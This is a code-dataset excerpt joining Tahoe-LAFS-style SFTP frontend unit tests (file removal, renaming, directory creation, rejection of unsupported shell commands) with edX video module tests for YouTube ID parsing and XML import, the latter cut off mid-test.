self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "removefile ''",
self.handler.removeFile, ""))
# removing a directory should fail
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "removeFile tiny_lit_dir",
self.handler.removeFile, "tiny_lit_dir"))
# removing a file should succeed
d.addCallback(lambda ign: self.root.get(u"gro\u00DF"))
d.addCallback(lambda ign: self.handler.removeFile(u"gro\u00DF".encode('utf-8')))
d.addCallback(lambda ign:
self.shouldFail(NoSuchChildError, "removeFile gross", "gro\\xdf",
self.root.get, u"gro\u00DF"))
# removing an unknown should succeed
d.addCallback(lambda ign: self.root.get(u"unknown"))
d.addCallback(lambda ign: self.handler.removeFile("unknown"))
d.addCallback(lambda ign:
self.shouldFail(NoSuchChildError, "removeFile unknown", "unknown",
self.root.get, u"unknown"))
# removing a link to an open file should not prevent it from being read
d.addCallback(lambda ign: self.handler.openFile("small", sftp.FXF_READ, {}))
def _remove_and_read_small(rf):
d2 = self.handler.removeFile("small")
d2.addCallback(lambda ign:
self.shouldFail(NoSuchChildError, "removeFile small", "small",
self.root.get, u"small"))
d2.addCallback(lambda ign: rf.readChunk(0, 10))
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "0123456789"))
d2.addCallback(lambda ign: rf.close())
return d2
d.addCallback(_remove_and_read_small)
# removing a link to a created file should prevent it from being created
d.addCallback(lambda ign: self.handler.openFile("tempfile", sftp.FXF_READ | sftp.FXF_WRITE |
sftp.FXF_CREAT, {}))
def _write_remove(rwf):
d2 = rwf.writeChunk(0, "0123456789")
d2.addCallback(lambda ign: self.handler.removeFile("tempfile"))
d2.addCallback(lambda ign: rwf.readChunk(0, 10))
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "0123456789"))
d2.addCallback(lambda ign: rwf.close())
return d2
d.addCallback(_write_remove)
d.addCallback(lambda ign:
self.shouldFail(NoSuchChildError, "removeFile tempfile", "tempfile",
self.root.get, u"tempfile"))
# ... even if the link is renamed while open
d.addCallback(lambda ign: self.handler.openFile("tempfile2", sftp.FXF_READ | sftp.FXF_WRITE |
sftp.FXF_CREAT, {}))
def _write_rename_remove(rwf):
d2 = rwf.writeChunk(0, "0123456789")
d2.addCallback(lambda ign: self.handler.renameFile("tempfile2", "tempfile3"))
d2.addCallback(lambda ign: self.handler.removeFile("tempfile3"))
d2.addCallback(lambda ign: rwf.readChunk(0, 10))
d2.addCallback(lambda data: self.failUnlessReallyEqual(data, "0123456789"))
d2.addCallback(lambda ign: rwf.close())
return d2
d.addCallback(_write_rename_remove)
d.addCallback(lambda ign:
self.shouldFail(NoSuchChildError, "removeFile tempfile2", "tempfile2",
self.root.get, u"tempfile2"))
d.addCallback(lambda ign:
self.shouldFail(NoSuchChildError, "removeFile tempfile3", "tempfile3",
self.root.get, u"tempfile3"))
d.addCallback(lambda ign: self.failUnlessEqual(sftpd.all_heisenfiles, {}))
d.addCallback(lambda ign: self.failUnlessEqual(self.handler._heisenfiles, {}))
return d
def test_removeDirectory(self):
d = self._set_up("removeDirectory")
d.addCallback(lambda ign: self._set_up_tree())
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "removeDirectory nodir",
self.handler.removeDirectory, "nodir"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "removeDirectory nodir/nodir",
self.handler.removeDirectory, "nodir/nodir"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "removeDirectory ''",
self.handler.removeDirectory, ""))
# removing a file should fail
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "removeDirectory gross",
self.handler.removeDirectory, u"gro\u00DF".encode('utf-8')))
# removing a directory should succeed
d.addCallback(lambda ign: self.root.get(u"tiny_lit_dir"))
d.addCallback(lambda ign: self.handler.removeDirectory("tiny_lit_dir"))
d.addCallback(lambda ign:
self.shouldFail(NoSuchChildError, "removeDirectory tiny_lit_dir", "tiny_lit_dir",
self.root.get, u"tiny_lit_dir"))
# removing an unknown should succeed
d.addCallback(lambda ign: self.root.get(u"unknown"))
d.addCallback(lambda ign: self.handler.removeDirectory("unknown"))
d.addCallback(lambda err:
self.shouldFail(NoSuchChildError, "removeDirectory unknown", "unknown",
self.root.get, u"unknown"))
d.addCallback(lambda ign: self.failUnlessEqual(sftpd.all_heisenfiles, {}))
d.addCallback(lambda ign: self.failUnlessEqual(self.handler._heisenfiles, {}))
return d
def test_renameFile(self):
d = self._set_up("renameFile")
d.addCallback(lambda ign: self._set_up_tree())
# renaming a non-existent file should fail
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "renameFile nofile newfile",
self.handler.renameFile, "nofile", "newfile"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "renameFile '' newfile",
self.handler.renameFile, "", "newfile"))
# renaming a file to a non-existent path should fail
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "renameFile small nodir/small",
self.handler.renameFile, "small", "nodir/small"))
# renaming a file to an invalid UTF-8 name should fail
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "renameFile small invalid",
self.handler.renameFile, "small", "\xFF"))
# renaming a file to or from an URI should fail
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "renameFile small from uri",
self.handler.renameFile, "uri/"+self.small_uri, "new"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "renameFile small to uri",
self.handler.renameFile, "small", "uri/fake_uri"))
# renaming a file onto an existing file, directory or unknown should fail
# The SFTP spec isn't clear about what error should be returned, but sshfs depends on
# it being FX_PERMISSION_DENIED.
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "renameFile small small2",
self.handler.renameFile, "small", "small2"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "renameFile small tiny_lit_dir",
self.handler.renameFile, "small", "tiny_lit_dir"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "renameFile small unknown",
self.handler.renameFile, "small", "unknown"))
# renaming a file onto a heisenfile should fail, even if the open hasn't completed
def _rename_onto_heisenfile_race(wf):
slow_open = defer.Deferred()
reactor.callLater(1, slow_open.callback, None)
d2 = self.handler.openFile("heisenfile", sftp.FXF_WRITE | sftp.FXF_CREAT, {}, delay=slow_open)
# deliberate race between openFile and renameFile
d3 = self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "renameFile small heisenfile",
self.handler.renameFile, "small", "heisenfile")
d2.addCallback(lambda wf: wf.close())
return deferredutil.gatherResults([d2, d3])
d.addCallback(_rename_onto_heisenfile_race)
# renaming a file to a correct path should succeed
d.addCallback(lambda ign: self.handler.renameFile("small", "new_small"))
d.addCallback(lambda ign: self.root.get(u"new_small"))
d.addCallback(lambda node: self.failUnlessReallyEqual(node.get_uri(), self.small_uri))
# renaming a file into a subdirectory should succeed (also tests Unicode names)
d.addCallback(lambda ign: self.handler.renameFile(u"gro\u00DF".encode('utf-8'),
u"loop/neue_gro\u00DF".encode('utf-8')))
d.addCallback(lambda ign: self.root.get(u"neue_gro\u00DF"))
d.addCallback(lambda node: self.failUnlessReallyEqual(node.get_uri(), self.gross_uri))
# renaming a directory to a correct path should succeed
d.addCallback(lambda ign: self.handler.renameFile("tiny_lit_dir", "new_tiny_lit_dir"))
d.addCallback(lambda ign: self.root.get(u"new_tiny_lit_dir"))
d.addCallback(lambda node: self.failUnlessReallyEqual(node.get_uri(), self.tiny_lit_dir_uri))
# renaming an unknown to a correct path should succeed
d.addCallback(lambda ign: self.handler.renameFile("unknown", "new_unknown"))
d.addCallback(lambda ign: self.root.get(u"new_unknown"))
d.addCallback(lambda node: self.failUnlessReallyEqual(node.get_uri(), self.unknown_uri))
d.addCallback(lambda ign: self.failUnlessEqual(sftpd.all_heisenfiles, {}))
d.addCallback(lambda ign: self.failUnlessEqual(self.handler._heisenfiles, {}))
return d
def test_renameFile_posix(self):
def _renameFile(fromPathstring, toPathstring):
extData = (struct.pack('>L', len(fromPathstring)) + fromPathstring +
struct.pack('>L', len(toPathstring)) + toPathstring)
d2 = self.handler.extendedRequest('[email protected]', extData)
def _check(res):
res.trap(sftp.SFTPError)
if res.value.code == sftp.FX_OK:
return None
return res
d2.addCallbacks(lambda res: self.fail("posix-rename request was supposed to "
"raise an SFTPError, not get '%r'" % (res,)),
_check)
return d2
d = self._set_up("renameFile_posix")
d.addCallback(lambda ign: self._set_up_tree())
d.addCallback(lambda ign: self.root.set_node(u"loop2", self.root))
d.addCallback(lambda ign: self.root.set_node(u"unknown2", self.unknown))
# POSIX-renaming a non-existent file should fail
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "renameFile_posix nofile newfile",
_renameFile, "nofile", "newfile"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "renameFile_posix '' newfile",
_renameFile, "", "newfile"))
# POSIX-renaming a file to a non-existent path should fail
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "renameFile_posix small nodir/small",
_renameFile, "small", "nodir/small"))
# POSIX-renaming a file to an invalid UTF-8 name should fail
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "renameFile_posix small invalid",
_renameFile, "small", "\xFF"))
# POSIX-renaming a file to or from an URI should fail
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "renameFile_posix small from uri",
_renameFile, "uri/"+self.small_uri, "new"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "renameFile_posix small to uri",
_renameFile, "small", "uri/fake_uri"))
# POSIX-renaming a file onto an existing file, directory or unknown should succeed
d.addCallback(lambda ign: _renameFile("small", "small2"))
d.addCallback(lambda ign: self.root.get(u"small2"))
d.addCallback(lambda node: self.failUnlessReallyEqual(node.get_uri(), self.small_uri))
d.addCallback(lambda ign: _renameFile("small2", "loop2"))
d.addCallback(lambda ign: self.root.get(u"loop2"))
d.addCallback(lambda node: self.failUnlessReallyEqual(node.get_uri(), self.small_uri))
d.addCallback(lambda ign: _renameFile("loop2", "unknown2"))
d.addCallback(lambda ign: self.root.get(u"unknown2"))
d.addCallback(lambda node: self.failUnlessReallyEqual(node.get_uri(), self.small_uri))
# POSIX-renaming a file to a correct new path should succeed
d.addCallback(lambda ign: _renameFile("unknown2", "new_small"))
d.addCallback(lambda ign: self.root.get(u"new_small"))
d.addCallback(lambda node: self.failUnlessReallyEqual(node.get_uri(), self.small_uri))
# POSIX-renaming a file into a subdirectory should succeed (also tests Unicode names)
d.addCallback(lambda ign: _renameFile(u"gro\u00DF".encode('utf-8'),
u"loop/neue_gro\u00DF".encode('utf-8')))
d.addCallback(lambda ign: self.root.get(u"neue_gro\u00DF"))
d.addCallback(lambda node: self.failUnlessReallyEqual(node.get_uri(), self.gross_uri))
# POSIX-renaming a directory to a correct path should succeed
d.addCallback(lambda ign: _renameFile("tiny_lit_dir", "new_tiny_lit_dir"))
d.addCallback(lambda ign: self.root.get(u"new_tiny_lit_dir"))
d.addCallback(lambda node: self.failUnlessReallyEqual(node.get_uri(), self.tiny_lit_dir_uri))
# POSIX-renaming an unknown to a correct path should succeed
d.addCallback(lambda ign: _renameFile("unknown", "new_unknown"))
d.addCallback(lambda ign: self.root.get(u"new_unknown"))
d.addCallback(lambda node: self.failUnlessReallyEqual(node.get_uri(), self.unknown_uri))
d.addCallback(lambda ign: self.failUnlessEqual(sftpd.all_heisenfiles, {}))
d.addCallback(lambda ign: self.failUnlessEqual(self.handler._heisenfiles, {}))
return d
def test_makeDirectory(self):
d = self._set_up("makeDirectory")
d.addCallback(lambda ign: self._set_up_tree())
# making a directory at a correct path should succeed
d.addCallback(lambda ign: self.handler.makeDirectory("newdir", {'ext_foo': 'bar', 'ctime': 42}))
d.addCallback(lambda ign: self.root.get_child_and_metadata(u"newdir"))
def _got( (child, metadata) ):
self.failUnless(IDirectoryNode.providedBy(child))
self.failUnless(child.is_mutable())
# FIXME
#self.failUnless('ctime' in metadata, metadata)
#self.failUnlessReallyEqual(metadata['ctime'], 42)
#self.failUnless('ext_foo' in metadata, metadata)
#self.failUnlessReallyEqual(metadata['ext_foo'], 'bar')
# TODO: child should be empty
d.addCallback(_got)
# making intermediate directories should also succeed
d.addCallback(lambda ign: self.handler.makeDirectory("newparent/newchild", {}))
d.addCallback(lambda ign: self.root.get(u"newparent"))
def _got_newparent(newparent):
self.failUnless(IDirectoryNode.providedBy(newparent))
self.failUnless(newparent.is_mutable())
return newparent.get(u"newchild")
d.addCallback(_got_newparent)
def _got_newchild(newchild):
self.failUnless(IDirectoryNode.providedBy(newchild))
self.failUnless(newchild.is_mutable())
d.addCallback(_got_newchild)
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "makeDirectory invalid UTF-8",
self.handler.makeDirectory, "\xFF", {}))
# should fail because there is an existing file "small"
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_FAILURE, "makeDirectory small",
self.handler.makeDirectory, "small", {}))
# directories cannot be created read-only via SFTP
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "makeDirectory newdir2 permissions:0444 denied",
self.handler.makeDirectory, "newdir2",
{'permissions': 0444}))
d.addCallback(lambda ign: self.failUnlessEqual(sftpd.all_heisenfiles, {}))
d.addCallback(lambda ign: self.failUnlessEqual(self.handler._heisenfiles, {}))
return d
def test_execCommand_and_openShell(self):
class MockProtocol:
def __init__(self):
self.output = ""
self.error = ""
self.reason = None
def write(self, data):
return self.outReceived(data)
def outReceived(self, data):
self.output += data
return defer.succeed(None)
def errReceived(self, data):
self.error += data
return defer.succeed(None)
def processEnded(self, reason):
self.reason = reason
return defer.succeed(None)
def _lines_end_in_crlf(s):
return s.replace('\r\n', '').find('\n') == -1 and s.endswith('\r\n')
d = self._set_up("execCommand_and_openShell")
d.addCallback(lambda ign: conch_interfaces.ISession(self.handler))
def _exec_df(session):
protocol = MockProtocol()
d2 = session.execCommand(protocol, "df -P -k /")
d2.addCallback(lambda ign: self.failUnlessIn("1024-blocks", protocol.output))
d2.addCallback(lambda ign: self.failUnless(_lines_end_in_crlf(protocol.output), protocol.output))
d2.addCallback(lambda ign: self.failUnlessEqual(protocol.error, ""))
d2.addCallback(lambda ign: self.failUnless(isinstance(protocol.reason.value, ProcessDone)))
d2.addCallback(lambda ign: session.eofReceived())
d2.addCallback(lambda ign: session.closed())
return d2
d.addCallback(_exec_df)
def _check_unsupported(protocol):
d2 = defer.succeed(None)
d2.addCallback(lambda ign: self.failUnlessEqual(protocol.output, ""))
d2.addCallback(lambda ign: self.failUnlessIn("only the SFTP protocol", protocol.error))
d2.addCallback(lambda ign: self.failUnless(_lines_end_in_crlf(protocol.error), protocol.error))
d2.addCallback(lambda ign: self.failUnless(isinstance(protocol.reason.value, ProcessTerminated)))
d2.addCallback(lambda ign: self.failUnlessEqual(protocol.reason.value.exitCode, 1))
return d2
d.addCallback(lambda ign: conch_interfaces.ISession(self.handler))
def _exec_error(session):
protocol = MockProtocol()
d2 = session.execCommand(protocol, "error")
d2.addCallback(lambda ign: session.windowChanged(None))
d2.addCallback(lambda ign: _check_unsupported(protocol))
d2.addCallback(lambda ign: session.closed())
return d2
d.addCallback(_exec_error)
d.addCallback(lambda ign: conch_interfaces.ISession(self.handler))
def _openShell(session):
protocol = MockProtocol()
d2 = session.openShell(protocol)
d2.addCallback(lambda ign: _check_unsupported(protocol))
d2.addCallback(lambda ign: session.closed())
return d2
d.addCallback(_openShell)
return d
def test_extendedRequest(self):
d = self._set_up("extendedRequest")
d.addCallback(lambda ign: self.handler.extendedRequest("[email protected]", "/"))
def _check(res):
self.failUnless(isinstance(res, str))
self.failUnlessEqual(len(res), 8*11)
d.addCallback(_check)
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_OP_UNSUPPORTED, "extendedRequest foo bar",
self.handler.extendedRequest, "foo", "bar"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_BAD_MESSAGE, "extendedRequest [email protected] invalid 1",
self.handler.extendedRequest, '[email protected]', ''))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_BAD_MESSAGE, "extendedRequest [email protected] invalid 2",
self.handler.extendedRequest, '[email protected]', '\x00\x00\x00\x01'))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_BAD_MESSAGE, "extendedRequest [email protected] invalid 3",
self.handler.extendedRequest, '[email protected]', '\x00\x00\x00\x01_\x00\x00\x00\x01'))
return d
| gpl-2.0 | 8,911,035,432,620,745,000 | 53.041022 | 136 | 0.594233 | false |
pku9104038/edx-platform | common/lib/xmodule/xmodule/tests/test_video.py | 2 | 22009 | # -*- coding: utf-8 -*-
#pylint: disable=W0212
"""Test for Video Xmodule functional logic.
These test data read from xml, not from mongo.
We have a ModuleStoreTestCase class defined in
common/lib/xmodule/xmodule/modulestore/tests/django_utils.py. You can
search for usages of this in the cms and lms tests for examples. You use
this so that it will do things like point the modulestore setting to mongo,
flush the contentstore before and after, load the templates, etc.
You can then use the CourseFactory and XModuleItemFactory as defined
in common/lib/xmodule/xmodule/modulestore/tests/factories.py to create
the course, section, subsection, unit, etc.
"""
import unittest
import datetime
from mock import Mock
from . import LogicTest
from lxml import etree
from xmodule.modulestore import Location
from xmodule.video_module import VideoDescriptor, _create_youtube_string
from .test_import import DummySystem
from xblock.field_data import DictFieldData
from xblock.fields import ScopeIds
from xmodule.tests import get_test_descriptor_system
class VideoModuleTest(LogicTest):
"""Logic tests for Video Xmodule."""
descriptor_class = VideoDescriptor
raw_field_data = {
'data': '<video />'
}
def test_parse_youtube(self):
"""Test parsing old-style Youtube ID strings into a dict."""
youtube_str = '0.75:jNCf2gIqpeE,1.00:ZwkTiUPN0mg,1.25:rsq9auxASqI,1.50:kMyNdzVHHgg'
output = VideoDescriptor._parse_youtube(youtube_str)
self.assertEqual(output, {'0.75': 'jNCf2gIqpeE',
'1.00': 'ZwkTiUPN0mg',
'1.25': 'rsq9auxASqI',
'1.50': 'kMyNdzVHHgg'})
def test_parse_youtube_one_video(self):
"""
Ensure that all keys are present and missing speeds map to the
empty string.
"""
youtube_str = '0.75:jNCf2gIqpeE'
output = VideoDescriptor._parse_youtube(youtube_str)
self.assertEqual(output, {'0.75': 'jNCf2gIqpeE',
'1.00': '',
'1.25': '',
'1.50': ''})
def test_parse_youtube_invalid(self):
"""Ensure that ids that are invalid return an empty dict"""
# invalid id
youtube_str = 'thisisaninvalidid'
output = VideoDescriptor._parse_youtube(youtube_str)
self.assertEqual(output, {'0.75': '',
'1.00': '',
'1.25': '',
'1.50': ''})
# another invalid id
youtube_str = ',::,:,,'
output = VideoDescriptor._parse_youtube(youtube_str)
self.assertEqual(output, {'0.75': '',
'1.00': '',
'1.25': '',
'1.50': ''})
# and another one, partially invalid
youtube_str = '0.75_BAD!!!,1.0:AXdE34_U,1.25:KLHF9K_Y,1.5:VO3SxfeD,'
output = VideoDescriptor._parse_youtube(youtube_str)
self.assertEqual(output, {'0.75': '',
'1.00': 'AXdE34_U',
'1.25': 'KLHF9K_Y',
'1.50': 'VO3SxfeD'})
def test_parse_youtube_key_format(self):
"""
Make sure that inconsistent speed keys are parsed correctly.
"""
youtube_str = '1.00:p2Q6BrNhdh8'
youtube_str_hack = '1.0:p2Q6BrNhdh8'
self.assertEqual(
VideoDescriptor._parse_youtube(youtube_str),
VideoDescriptor._parse_youtube(youtube_str_hack)
)
def test_parse_youtube_empty(self):
"""
Some courses have empty youtube attributes, so we should handle
that well.
"""
self.assertEqual(
VideoDescriptor._parse_youtube(''),
{'0.75': '',
'1.00': '',
'1.25': '',
'1.50': ''}
)
class VideoDescriptorTest(unittest.TestCase):
"""Test for VideoDescriptor"""
def setUp(self):
system = get_test_descriptor_system()
location = Location('i4x://org/course/video/name')
self.descriptor = system.construct_xblock_from_class(
VideoDescriptor,
scope_ids=ScopeIds(None, None, location, location),
field_data=DictFieldData({}),
)
def test_get_context(self):
""""test get_context"""
correct_tabs = [
{
'name': "Basic",
'template': "video/transcripts.html",
'current': True
},
{
'name': 'Advanced',
'template': 'tabs/metadata-edit-tab.html'
}
]
rendered_context = self.descriptor.get_context()
self.assertListEqual(rendered_context['tabs'], correct_tabs)
def test_create_youtube_string(self):
"""
Test that Youtube ID strings are correctly created when writing
back out to XML.
"""
system = DummySystem(load_error_modules=True)
location = Location(["i4x", "edX", "video", "default", "SampleProblem1"])
field_data = DictFieldData({'location': location})
descriptor = VideoDescriptor(system, field_data, Mock())
descriptor.youtube_id_0_75 = 'izygArpw-Qo'
descriptor.youtube_id_1_0 = 'p2Q6BrNhdh8'
descriptor.youtube_id_1_25 = '1EeWXzPdhSA'
descriptor.youtube_id_1_5 = 'rABDYkeK0x8'
expected = "0.75:izygArpw-Qo,1.00:p2Q6BrNhdh8,1.25:1EeWXzPdhSA,1.50:rABDYkeK0x8"
self.assertEqual(_create_youtube_string(descriptor), expected)
def test_create_youtube_string_missing(self):
"""
Test that Youtube IDs which aren't explicitly set aren't included
in the output string.
"""
system = DummySystem(load_error_modules=True)
location = Location(["i4x", "edX", "video", "default", "SampleProblem1"])
field_data = DictFieldData({'location': location})
descriptor = VideoDescriptor(system, field_data, Mock())
descriptor.youtube_id_0_75 = 'izygArpw-Qo'
descriptor.youtube_id_1_0 = 'p2Q6BrNhdh8'
descriptor.youtube_id_1_25 = '1EeWXzPdhSA'
expected = "0.75:izygArpw-Qo,1.00:p2Q6BrNhdh8,1.25:1EeWXzPdhSA"
self.assertEqual(_create_youtube_string(descriptor), expected)
class VideoDescriptorImportTestCase(unittest.TestCase):
"""
Make sure that VideoDescriptor can import an old XML-based video correctly.
"""
def assert_attributes_equal(self, video, attrs):
"""
Assert that `video` has the correct attributes. `attrs` is a map
of {metadata_field: value}.
"""
for key, value in attrs.items():
self.assertEquals(getattr(video, key), value)
def test_constructor(self):
sample_xml = '''
<video display_name="Test Video"
youtube="1.0:p2Q6BrNhdh8,0.75:izygArpw-Qo,1.25:1EeWXzPdhSA,1.5:rABDYkeK0x8"
show_captions="false"
download_track="true"
download_video="true"
start_time="00:00:01"
end_time="00:01:00">
<source src="http://www.example.com/source.mp4"/>
<source src="http://www.example.com/source.ogg"/>
<track src="http://www.example.com/track"/>
</video>
'''
location = Location(["i4x", "edX", "video", "default",
"SampleProblem1"])
field_data = DictFieldData({
'data': sample_xml,
'location': location
})
system = DummySystem(load_error_modules=True)
descriptor = VideoDescriptor(system, field_data, Mock())
self.assert_attributes_equal(descriptor, {
'youtube_id_0_75': 'izygArpw-Qo',
'youtube_id_1_0': 'p2Q6BrNhdh8',
'youtube_id_1_25': '1EeWXzPdhSA',
'youtube_id_1_5': 'rABDYkeK0x8',
'download_video': True,
'show_captions': False,
'start_time': datetime.timedelta(seconds=1),
'end_time': datetime.timedelta(seconds=60),
'track': 'http://www.example.com/track',
'download_track': True,
'html5_sources': ['http://www.example.com/source.mp4', 'http://www.example.com/source.ogg'],
'data': ''
})
def test_from_xml(self):
module_system = DummySystem(load_error_modules=True)
xml_data = '''
<video display_name="Test Video"
youtube="1.0:p2Q6BrNhdh8,0.75:izygArpw-Qo,1.25:1EeWXzPdhSA,1.5:rABDYkeK0x8"
show_captions="false"
download_track="false"
start_time="00:00:01"
download_video="false"
end_time="00:01:00">
<source src="http://www.example.com/source.mp4"/>
<track src="http://www.example.com/track"/>
</video>
'''
output = VideoDescriptor.from_xml(xml_data, module_system, Mock())
self.assert_attributes_equal(output, {
'youtube_id_0_75': 'izygArpw-Qo',
'youtube_id_1_0': 'p2Q6BrNhdh8',
'youtube_id_1_25': '1EeWXzPdhSA',
'youtube_id_1_5': 'rABDYkeK0x8',
'show_captions': False,
'start_time': datetime.timedelta(seconds=1),
'end_time': datetime.timedelta(seconds=60),
'track': 'http://www.example.com/track',
'download_track': False,
'download_video': False,
'html5_sources': ['http://www.example.com/source.mp4'],
'data': ''
})
def test_from_xml_missing_attributes(self):
"""
Ensure that attributes have the right values if they aren't
explicitly set in XML.
"""
module_system = DummySystem(load_error_modules=True)
xml_data = '''
<video display_name="Test Video"
youtube="1.0:p2Q6BrNhdh8,1.25:1EeWXzPdhSA"
show_captions="true">
<source src="http://www.example.com/source.mp4"/>
</video>
'''
output = VideoDescriptor.from_xml(xml_data, module_system, Mock())
self.assert_attributes_equal(output, {
'youtube_id_0_75': '',
'youtube_id_1_0': 'p2Q6BrNhdh8',
'youtube_id_1_25': '1EeWXzPdhSA',
'youtube_id_1_5': '',
'show_captions': True,
'start_time': datetime.timedelta(seconds=0.0),
'end_time': datetime.timedelta(seconds=0.0),
'track': '',
'download_track': False,
'download_video': False,
'html5_sources': ['http://www.example.com/source.mp4'],
'data': ''
})
def test_from_xml_no_attributes(self):
"""
Make sure settings are correct if none are explicitly set in XML.
"""
module_system = DummySystem(load_error_modules=True)
xml_data = '<video></video>'
output = VideoDescriptor.from_xml(xml_data, module_system, Mock())
self.assert_attributes_equal(output, {
'youtube_id_0_75': '',
'youtube_id_1_0': 'OEoXaMPEzfM',
'youtube_id_1_25': '',
'youtube_id_1_5': '',
'show_captions': True,
'start_time': datetime.timedelta(seconds=0.0),
'end_time': datetime.timedelta(seconds=0.0),
'track': '',
'download_track': False,
'download_video': False,
'html5_sources': [],
'data': ''
})
def test_from_xml_double_quotes(self):
"""
Make sure we can handle the double-quoted string format (which was used for exporting for
a few weeks).
"""
module_system = DummySystem(load_error_modules=True)
xml_data = '''
<video display_name=""display_name""
html5_sources="["source_1", "source_2"]"
show_captions="false"
download_video="true"
sub=""html5_subtitles""
track=""http://download_track""
download_track="true"
youtube_id_0_75=""OEoXaMPEzf65""
youtube_id_1_25=""OEoXaMPEzf125""
youtube_id_1_5=""OEoXaMPEzf15""
youtube_id_1_0=""OEoXaMPEzf10""
/>
'''
output = VideoDescriptor.from_xml(xml_data, module_system, Mock())
self.assert_attributes_equal(output, {
'youtube_id_0_75': 'OEoXaMPEzf65',
'youtube_id_1_0': 'OEoXaMPEzf10',
'youtube_id_1_25': 'OEoXaMPEzf125',
'youtube_id_1_5': 'OEoXaMPEzf15',
'show_captions': False,
'start_time': datetime.timedelta(seconds=0.0),
'end_time': datetime.timedelta(seconds=0.0),
'track': 'http://download_track',
'download_track': True,
'download_video': True,
'html5_sources': ["source_1", "source_2"],
'data': ''
})
def test_from_xml_double_quote_concatenated_youtube(self):
module_system = DummySystem(load_error_modules=True)
xml_data = '''
<video display_name="Test Video"
youtube="1.0:"p2Q6BrNhdh8",1.25:"1EeWXzPdhSA"">
</video>
'''
output = VideoDescriptor.from_xml(xml_data, module_system, Mock())
self.assert_attributes_equal(output, {
'youtube_id_0_75': '',
'youtube_id_1_0': 'p2Q6BrNhdh8',
'youtube_id_1_25': '1EeWXzPdhSA',
'youtube_id_1_5': '',
'show_captions': True,
'start_time': datetime.timedelta(seconds=0.0),
'end_time': datetime.timedelta(seconds=0.0),
'track': '',
'download_track': False,
'download_video': False,
'html5_sources': [],
'data': ''
})
def test_old_video_format(self):
"""
Test backwards compatibility with VideoModule's XML format.
"""
module_system = DummySystem(load_error_modules=True)
xml_data = """
<video display_name="Test Video"
youtube="1.0:p2Q6BrNhdh8,0.75:izygArpw-Qo,1.25:1EeWXzPdhSA,1.5:rABDYkeK0x8"
show_captions="false"
source="http://www.example.com/source.mp4"
from="00:00:01"
to="00:01:00">
<source src="http://www.example.com/source.mp4"/>
<track src="http://www.example.com/track"/>
</video>
"""
output = VideoDescriptor.from_xml(xml_data, module_system, Mock())
self.assert_attributes_equal(output, {
'youtube_id_0_75': 'izygArpw-Qo',
'youtube_id_1_0': 'p2Q6BrNhdh8',
'youtube_id_1_25': '1EeWXzPdhSA',
'youtube_id_1_5': 'rABDYkeK0x8',
'show_captions': False,
'start_time': datetime.timedelta(seconds=1),
'end_time': datetime.timedelta(seconds=60),
'track': 'http://www.example.com/track',
'download_track': True,
'html5_sources': ['http://www.example.com/source.mp4'],
'data': '',
})
def test_old_video_data(self):
"""
Ensure that Video is able to read VideoModule's model data.
"""
module_system = DummySystem(load_error_modules=True)
xml_data = """
<video display_name="Test Video"
youtube="1.0:p2Q6BrNhdh8,0.75:izygArpw-Qo,1.25:1EeWXzPdhSA,1.5:rABDYkeK0x8"
show_captions="false"
from="00:00:01"
to="00:01:00">
<source src="http://www.example.com/source.mp4"/>
<track src="http://www.example.com/track"/>
</video>
"""
video = VideoDescriptor.from_xml(xml_data, module_system, Mock())
self.assert_attributes_equal(video, {
'youtube_id_0_75': 'izygArpw-Qo',
'youtube_id_1_0': 'p2Q6BrNhdh8',
'youtube_id_1_25': '1EeWXzPdhSA',
'youtube_id_1_5': 'rABDYkeK0x8',
'show_captions': False,
'start_time': datetime.timedelta(seconds=1),
'end_time': datetime.timedelta(seconds=60),
'track': 'http://www.example.com/track',
'download_track': True,
'html5_sources': ['http://www.example.com/source.mp4'],
'data': ''
})
def test_import_with_float_times(self):
"""
Ensure that Video is able to read VideoModule's model data.
"""
module_system = DummySystem(load_error_modules=True)
xml_data = """
<video display_name="Test Video"
youtube="1.0:p2Q6BrNhdh8,0.75:izygArpw-Qo,1.25:1EeWXzPdhSA,1.5:rABDYkeK0x8"
